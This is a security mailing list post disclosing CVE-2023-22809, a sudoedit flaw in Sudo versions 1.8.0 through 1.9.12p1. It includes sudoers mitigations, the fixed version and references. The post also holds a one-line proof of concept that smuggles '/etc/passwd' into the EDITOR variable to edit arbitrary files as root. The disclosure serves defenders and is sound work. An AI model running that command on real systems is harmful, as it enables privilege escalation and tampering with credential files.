Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 19 Jan 2023 01:33:43 +0100
From: Matthieu Barjole <matthieu.barjole@...acktiv.com>
To: oss-security@...ts.openwall.com
Subject: CVE-2023-22809: Sudoedit can edit arbitrary files

Hello everyone,

While auditing Sudo, Synacktiv identified a privilege escalation in sudoedit
when a user is authorized to use it by the sudoers policy. This
vulnerability
was assigned CVE-2023-22809 and affects Sudo versions 1.8.0 through 1.9.12p1
inclusive.

## Analysis

The technical analysis can be found in the following security advisory:
https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf

## Proof of Concept

Assuming the following sudoers policy:

```
# cat /etc/sudoers
user ALL=(ALL:ALL) sudoedit /etc/motd
[...]
```

Arbitrary files such as `/etc/passwd` may also be edited as such:

```
EDITOR='vim -- /etc/passwd' sudoedit /etc/motd
```

## Mitigation

It is possible to prevent a user-specified editor from being used by
sudoedit by
adding the following line to the sudoers file.

```
Defaults!sudoedit   env_delete+="SUDO_EDITOR VISUAL EDITOR"
```

To restrict the editor when editing specific files, a Cmnd_Alias can be
used,
for example:

```
Cmnd_Alias          EDIT_MOTD = sudoedit /etc/motd
Defaults!EDIT_MOTD  env_delete+="SUDO_EDITOR VISUAL EDITOR"
user                ALL = EDIT_MOTD
```

## Fix

The issue was fixed in Sudo 1.9.12.p2.

## References

[1]
https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf
[2] https://www.sudo.ws/security/advisories/sudoedit_any/
[3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22809

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.